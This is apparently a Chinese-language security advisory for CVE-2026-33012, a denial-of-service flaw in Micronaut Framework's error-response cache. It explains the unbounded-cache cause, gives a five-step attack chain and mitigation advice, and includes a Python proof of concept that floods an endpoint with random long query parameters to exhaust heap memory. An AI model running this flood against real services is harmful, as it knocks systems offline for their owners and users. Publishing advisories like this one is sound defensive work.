CVE-2026-33012 CVSS 7.5 高危

CVE-2026-33012 Micronaut Framework 拒绝服务漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33012

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Micronaut Framework

漏洞概述

Micronaut Framework 4.7.0至4.10.16版本中存在拒绝服务漏洞。该漏洞源于`DefaultHtmlErrorResponseBodyProvider`组件使用了无界且无驱逐策略的`ConcurrentHashMap`缓存。远程攻击者可利用受控的异常消息（如通过请求参数）触发缓存机制，导致无界堆内存增长，最终引发`OutOfMemoryError`，从而造成服务拒绝。

技术细节

该漏洞位于Micronaut的错误响应处理逻辑中。`DefaultHtmlErrorResponseBodyProvider`使用`ConcurrentHashMap`来缓存错误响应体以提高性能，但未配置缓存大小限制或过期策略。攻击者可以通过发送包含不断变化的、长字符串（例如随机生成的查询参数）的HTTP请求来触发应用程序异常。由于异常消息中包含这些用户输入的字符串，系统会将它们作为键存入缓存。随着攻击持续，大量唯一的键被添加到无界缓存中，导致JVM堆内存迅速耗尽，最终触发`OutOfMemoryError`，使应用程序崩溃并无法提供服务。

攻击链分析

STEP 1

1. 侦察

攻击者识别出目标应用使用的是存在漏洞的Micronaut Framework版本（4.7.0-4.10.16）。

STEP 2

2. 构造恶意请求

攻击者编写脚本，生成包含随机且唯一的长字符串参数的HTTP请求。

STEP 3

3. 触发漏洞

向目标服务器发送大量此类请求，导致服务器抛出包含恶意参数的异常。

STEP 4

4. 缓存内存耗尽

`DefaultHtmlErrorResponseBodyProvider`将唯一的异常消息存入无界缓存，导致堆内存持续增长。

STEP 5

5. 拒绝服务

JVM内存耗尽抛出`OutOfMemoryError`，应用程序崩溃或无法处理新请求。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import random
import string

def generate_random_string(length=100):
    return ''.join(random.choices(string.ascii_letters + string.digits, k=length))

def exploit(target_url):
    print(f"[+] Targeting {target_url}")
    try:
        while True:
            # Generate a unique long parameter to fill the cache
            payload = generate_random_string(200)
            # Assuming the endpoint echoes back the param or causes an error with it
            url = f"{target_url}?input={payload}"
            response = requests.get(url, timeout=5)
            print(f"Sent request with payload length {len(payload)}, Status: {response.status_code}")
    except KeyboardInterrupt:
        print("\n[-] Exploit stopped by user")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    # Replace with actual vulnerable endpoint
    target = "http://localhost:8080/error"
    exploit(target)

影响范围

Micronaut Framework 4.7.0 - 4.10.16

防御指南

临时缓解措施

建议尽快升级至修复版本。在升级前，可通过配置反向代理（如Nginx）限制单个请求的URL长度或参数长度，以减少攻击者注入大量数据导致缓存膨胀的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表